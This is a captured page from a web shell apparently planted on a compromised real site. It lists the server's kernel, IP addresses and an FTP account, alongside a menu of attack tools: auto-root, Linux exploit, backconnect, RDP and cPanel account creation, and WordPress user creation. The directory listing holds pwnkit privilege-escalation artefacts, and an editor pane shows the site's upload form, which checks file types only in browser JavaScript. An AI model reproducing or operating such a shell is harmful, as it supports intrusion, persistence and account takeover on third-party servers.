Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
ajax /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-x---
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
style
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ReadMe.txt
94
B
-rw-r--r--
index.php
2.42
KB
-rw-r--r--
index1.php
1.11
KB
-rw-r--r--
processupload.php
6.92
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
upload-picture.php
2.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index1.php
<script type="text/javascript"> function ajaxFileUpload(upload_field) { // Checking file type var re_text = /\.jpg|\.gif|\.jpeg/i; var filename = upload_field.value; if (filename.search(re_text) == -1) { alert("File should be either jpg or gif or jpeg"); upload_field.form.reset(); return false; } document.getElementById('picture_preview').innerHTML = '<div><img src="images/progressbar.gif" border="0" /></div>'; upload_field.form.action = 'upload-picture.php'; upload_field.form.target = 'upload_iframe'; upload_field.form.submit(); upload_field.form.action = ''; upload_field.form.target = ''; return true; } </script> <!-- iframe used for ajax file upload--> <!-- debug: change it to style="display:block" --> <iframe name="upload_iframe" id="upload_iframe" style="display:none;"></iframe> <!-- iframe used for ajax file upload--> <form name="pictureForm" method="post" autocomplete="off" enctype="multipart/form-data"> <div> <span>Upload Picture :</span> <input type="file" name="picture" id="picture" onchange="return ajaxFileUpload(this);" /> <span id="picture_error"></span> <div id="picture_preview"></div> </div> </form>
Close